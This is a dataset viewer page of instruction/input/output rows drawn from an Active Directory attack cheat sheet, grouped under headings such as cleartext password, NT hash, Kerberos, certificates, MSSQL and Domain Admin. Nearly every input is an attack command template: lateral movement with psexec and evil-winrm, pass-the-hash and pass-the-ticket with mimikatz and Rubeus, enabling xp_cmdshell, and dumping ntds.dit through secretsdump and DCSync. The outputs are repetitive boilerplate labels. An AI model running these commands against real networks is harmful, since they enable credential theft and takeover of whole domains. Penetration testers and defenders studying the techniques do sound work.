instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Clear text Password | psexec.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | psexec.exe -AcceptEULA \\<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | psexecsvc.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | Pseudo-shell (file write and read) | Note or procedural step under 'Clear text Password'. |
Clear text Password | atexec.py <domain>/<user>:<password>@<ip> "command" | Note or procedural step under 'Clear text Password'. |
Clear text Password | smbexec.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | wmiexec.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | dcomexec.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | nxc smb <ip_range> -u <user> -p <password> -d <domain> -x <cmd> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Clear text Password | WinRM | Note or procedural step under 'Clear text Password'. |
Clear text Password | evil-winrm -i <ip> -u <user> -p <password> | Note or procedural step under 'Clear text Password'. |
Clear text Password | Enter-PSSession -ComputerName <computer> -Credential <domain>\<user> | Note or procedural step under 'Clear text Password'. |
Clear text Password | nxc winrm <ip_range> -u <user> -p <password> -d <domain> -x <cmd> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Clear text Password | RDP | Note or procedural step under 'Clear text Password'. |
Clear text Password | xfreerdp /u:<user> /d:<domain> /p:<password> /v:<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | SMB | Note or procedural step under 'Clear text Password'. |
Clear text Password | smbclient.py <domain>/<user>:<password>@<ip> | SMB client usage to list or access network shares. |
Clear text Password | smbclient-ng.py -d <domain> -u <user> -p <password> --host <ip> | SMB client usage to list or access network shares. |
Clear text Password | MSSQL | Note or procedural step under 'Clear text Password'. |
Clear text Password | nxc mssql <ip_range> -u <user> -p <password> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Clear text Password | mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
NT Hash | Pass the Hash | Note or procedural step under 'NT Hash'. |
NT Hash | mimikatz "privilege::debug sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
NT Hash | RDP | Note or procedural step under 'NT Hash'. |
NT Hash | reg.py <domain>/<user>@<ip> -hashes ':<hash>' add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v 'DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0' | Note or procedural step under 'NT Hash'. |
NT Hash | WinRM | Note or procedural step under 'NT Hash'. |
NT Hash | evil-winrm -i <ip> -u <user> -H <hash> | Note or procedural step under 'NT Hash'. |
NT Hash | Overpass the Hash / Pass the key (PTK) | Note or procedural step under 'NT Hash'. |
NT Hash | Rubeus.exe asktgt /user:victim /rc4:<rc4value> | Tool or command referenced under 'NT Hash'. |
NT Hash | Rubeus.exe ptt /ticket:<ticket> | Tool or command referenced under 'NT Hash'. |
NT Hash | Rubeus.exe createnetonly /program:C:\Windows\System32\[cmd.exe||upnpcont.exe] | Tool or command referenced under 'NT Hash'. |
NT Hash | getTGT.py <domain>/<user> -hashes :<hashes> | Note or procedural step under 'NT Hash'. |
NT Hash | getTGT.py <domain>/<user> -hashes :<hashes> | Note or procedural step under 'NT Hash'. |
Kerberos | Pass the Ticket (ccache / kirbi) | Note or procedural step under 'Kerberos'. |
Kerberos | Convert Format | Note or procedural step under 'Kerberos'. |
Kerberos | ticketConverter.py <kirbi||ccache> <ccache||kirbi> | Note or procedural step under 'Kerberos'. |
Kerberos | export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache | Note or procedural step under 'Kerberos'. |
Kerberos | impacket tools: Same as Pass the hash but use : -k and -no-pass for impacket | Note or procedural step under 'Kerberos'. |
Kerberos | mimikatz kerberos::ptc "<ticket>" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Kerberos | Rubeus.exe ptt /ticket:<ticket> | Tool or command referenced under 'Kerberos'. |
Kerberos | proxychains secretsdump.py -k'<domain>'/'<user>'@'<ip>' | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Kerberos | Modify SPN | Note or procedural step under 'Kerberos'. |
Kerberos | tgssub.py -in <ticket.ccache> -out <newticket.ccache> -altservice "<service>/<target>" #pr 1256 | Note or procedural step under 'Kerberos'. |
Kerberos | Aeskey | Note or procedural step under 'Kerberos'. |
Kerberos | impacket tools: Same as Pass the hash but use : -aesKey for impacket (and use FQDN) | Note or procedural step under 'Kerberos'. |
Kerberos | proxychains secretsdump.py -aesKey <key> '<domain>'/'<user>'@'<ip>' | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Socks (relay) | proxychains lookupsid.py <domain>/<user>@<ip> -no-pass -domain-sids | Note or procedural step under 'Socks (relay)'. |
Socks (relay) | proxychains mssqlclient.py -windows-auth <domain>/<user>@<ip> -no-pass | Note or procedural step under 'Socks (relay)'. |
Socks (relay) | proxychains secretsdump.py -no-pass '<domain>'/'<user>'@'<ip>' | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Socks (relay) | proxychains smbclient.py -no-pass <user>@<ip> | SMB client usage to list or access network shares. |
Socks (relay) | proxychains atexec.py -no-pass <domain>/<user>@<ip> "command" | Note or procedural step under 'Socks (relay)'. |
Socks (relay) | proxychains smbexec.py -no-pass <domain>/<user>@<ip> | Note or procedural step under 'Socks (relay)'. |
Certificate (pfx) | unpac the hash | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | certipy auth -pfx <crt_file> -dc-ip <dc_ip> | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | gettgtpkinit.py -cert-pfx <crt.pfx> -pfx-pass <crt_pass> "<domain>/<dc_name>" <tgt.ccache> | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | getnthash.py -key '<AS-REP encryption key>' '<domain>'/'<dc_name>' | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | Pass the certificate | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | pkinit | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | gettgtpkinit.py -cert-pfx "<pfx_file>" ^[-pfx-pass "<cert-password>"] "<fqdn_domain>/<user>" "<tgt_ccache_file>" | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | Rubeus.exe asktgt /user:"<username>" /certificate:"<pfx_file>" [/password:"<certificate_password>"] /domain:"<fqdn-domain>" /dc:"<dc>" /show | Tool or command referenced under 'Certificate (pfx)'. |
Certificate (pfx) | certipy auth -pfx <crt_file> -dc-ip <dc_ip> | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | schannel | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | certipy auth -pfx <pfx_file> -ldap-shell | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | add_computer | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | Set RBCD | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | certipy cert -pfx "<pfx_file>" -nokey -out "user.crt" | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | certipy cert -pfx "<pfx_file>" -nocert -out "user.key" | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | passthecert.py -action ldap-shell -crt <user.crt> -key <user.key> -domain <domain> -dc-ip <dc_ip> | Note or procedural step under 'Certificate (pfx)'. |
MSSQL | find mssql access | Note or procedural step under 'MSSQL'. |
MSSQL | nxc mssql <ip> -u <user> -p <password> -d <domain> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
MSSQL | Users or Computers with SQL admin | Note or procedural step under 'MSSQL'. |
MSSQL | MATCH p=(u:Base)-[:SQLAdmin]->(c:Computer) RETURN p | Note or procedural step under 'MSSQL'. |
MSSQL | MSSQL | Note or procedural step under 'MSSQL'. |
MSSQL | mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip> | Note or procedural step under 'MSSQL'. |
MSSQL | enum_db | Note or procedural step under 'MSSQL'. |
MSSQL | enable_xp_cmdshell | Note or procedural step under 'MSSQL'. |
MSSQL | xp_cmdshell <cmd> | Note or procedural step under 'MSSQL'. |
MSSQL | enum_impersonate | Note or procedural step under 'MSSQL'. |
MSSQL | exec_as_user <user> | Note or procedural step under 'MSSQL'. |
MSSQL | exec_as_login <login> | Note or procedural step under 'MSSQL'. |
MSSQL | xp_dir_tree <ip> | Note or procedural step under 'MSSQL'. |
MSSQL | COERCE SMB | Note or procedural step under 'MSSQL'. |
MSSQL | trustlink | Note or procedural step under 'MSSQL'. |
MSSQL | sp_linkedservers | Note or procedural step under 'MSSQL'. |
MSSQL | use_link | Note or procedural step under 'MSSQL'. |
Domain Admin | Dump ntds.dit | Note or procedural step under 'Domain Admin'. |
Domain Admin | nxc smb <dcip> -u <user> -p <password> -d <domain> --ntds | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Domain Admin | secretsdump.py '<domain>/<user>:<pass>'@<ip> | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Domain Admin | ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q | Note or procedural step under 'Domain Admin'. |
Domain Admin | secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Domain Admin | msf> windows/gather/credentials/domain_hashdump | Tool or command referenced under 'Domain Admin'. |
Domain Admin | mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Domain Admin | certsync -u <user> -p '<password>' -d <domain> -dc-ip <dc_ip> -ns <name_server> | Note or procedural step under 'Domain Admin'. |
Grab backup Keys | donpapi collect - H ':<hash>' <domain>/<user>@<ip_range> -t ALL --fetch-pvk #Credentials | Note or procedural step under 'Grab backup Keys'. |
Enumeration | nltest.exe /trusted_domains | Note or procedural step under 'Enumeration'. |
Enumeration | ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | Note or procedural step under 'Enumeration'. |
Enumeration | Get-DomainTrust -Domain <domain> | Note or procedural step under 'Enumeration'. |
Enumeration | Get-DomainTrustMapping | Note or procedural step under 'Enumeration'. |
Enumeration | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> trusts | Note or procedural step under 'Enumeration'. |
Enumeration | sharphound.exe -c trusts -d <domain> | Note or procedural step under 'Enumeration'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.